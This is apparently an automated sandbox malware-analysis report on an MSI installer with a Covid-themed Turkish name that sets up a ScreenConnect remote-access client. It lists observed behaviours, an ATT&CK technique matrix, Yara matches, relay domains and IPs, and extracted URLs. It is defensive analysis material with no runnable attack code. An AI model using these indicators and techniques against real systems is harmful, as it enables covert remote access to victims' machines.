                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E33894 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: svchost.exe, 00000011.00000002.460655353.000002ABF0040000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000011.00000002.460913166.000002ABF0102000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,
                      Source: Yara matchFile source: 00000005.00000002.471825192.0000000004112000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.212668661.00000000005B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.457186960.0000000000CF2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.203704441.00000269DBA8D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.204518995.0000000000CF2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.457213265.00000000005B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.203551548.00000269DBA5B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5304, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5072, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4316, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5888, type: MEMORY
                      Source: Yara matchFile source: 7.2.ScreenConnect.WindowsClient.exe.5b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.ScreenConnect.WindowsClient.exe.5b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Replication Through Removable Media1Windows Management Instrumentation131DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11Input Capture1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter12Windows Service4Windows Service4Obfuscated Files or Information1Security Account ManagerSystem Information Discovery155SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Logon Script (Mac)Process Injection2Timestomp1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery81SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion4DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection2Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 355327 Sample: Covid 19 bilgi y#U00f6netim... Startdate: 19/02/2021 Architecture: WINDOWS Score: 60 45 .NET source code references suspicious native API functions 2->45 47 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 2->47 49 Binary contains a suspicious time stamp 2->49 51 Contains functionality to log keystrokes (.Net Source) 2->51 7 svchost.exe 2->7         started        10 ScreenConnect.ClientService.exe 4 2->10         started        13 msiexec.exe 2->13         started        15 12 other processes 2->15 process3 dnsIp4 53 Changes security center settings (notifications, updates, antivirus, firewall) 7->53 18 MpCmdRun.exe 7->18         started        37 server-ovh31150295-relay.screenconnect.com 51.77.118.172, 443, 49705 OVHFR France 10->37 39 192.168.2.1 unknown unknown 10->39 41 instance-s6p2r4-relay.screenconnect.com 10->41 20 ScreenConnect.WindowsClient.exe 2 10->20         started        22 ScreenConnect.WindowsClient.exe 2 10->22         started        24 rundll32.exe 7 13->24         started        43 127.0.0.1 unknown unknown 15->43 35 C:\Users\user\AppData\Local\...\MSIDAF2.tmp, PE32 15->35 dropped file5 signatures6 process7 file8 27 conhost.exe 18->27         started        29 C:\...\ScreenConnect.InstallerActions.dll, PE32 24->29 dropped 31 C:\Users\user\...\ScreenConnect.Core.dll, PE32 24->31 dropped 33 Microsoft.Deployme...indowsInstaller.dll, PE32 24->33 dropped process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Covid 19 bilgi y#U00f6netim sistemi.msi0%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp2%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.carterandcone.como.nV0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/XTj0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/F0%Avira URL Cloudsafe
                      http://www.fontbureau.comFzV0%Avira URL Cloudsafe
                      http://www.carterandcone.como.zV0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/.TTCSV0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/HLj0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/XTj0%Avira URL Cloudsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.zhongyicts.com.cnwdthK0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/Y0/XTj0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/j0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.carterandcone.comFBV0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/FTV0%Avira URL Cloudsafe
                      http://www.fontbureau.comFcnV0%Avira URL Cloudsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sajatypeworks.comrBV0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/.TTC0%Avira URL Cloudsafe
                      http://en.wikipedia0%URL Reputationsafe
                      http://en.wikipedia0%URL Reputationsafe
                      http://en.wikipedia0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
                      http://www.carterandcone.comj0%Avira URL Cloudsafe
                      http://www.carterandcone.comi0%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/FSV0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.fontbureau.comj0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com.0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/j0%Avira URL Cloudsafe
                      http://www.carterandcone.comcomj0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/YV0%Avira URL Cloudsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      server-ovh31150295-relay.screenconnect.com
                      51.77.118.172
                      truefalse
                        high
                        instance-s6p2r4-relay.screenconnect.com
                        unknown
                        unknownfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.carterandcone.como.nVScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.com/designersGScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bTheScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/XTjScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpfalse
                                high
                                http://www.jiyu-kobo.co.jp/jp/FScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                  high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comFzVScreenConnect.WindowsClient.exe, 00000006.00000003.246998651.000000001C69A000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.carterandcone.como.zVScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/.TTCSVScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.tiro.comScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designersScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                            high
                                            http://wixtoolset.org/news/Microsoft.Deployment.WindowsInstaller.dll.2.drfalse
                                              high
                                              http://www.goodfont.co.krScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000F.00000002.308918837.0000022453A42000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.carterandcone.comScreenConnect.WindowsClient.exe, 00000006.00000003.242447973.000000001C6B1000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/HLjScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sajatypeworks.comScreenConnect.WindowsClient.exe, 00000006.00000003.239416728.000000001C6B4000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.239355160.000000001C6B4000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/jp/XTjScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.typography.netDScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://fontfabrik.comScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
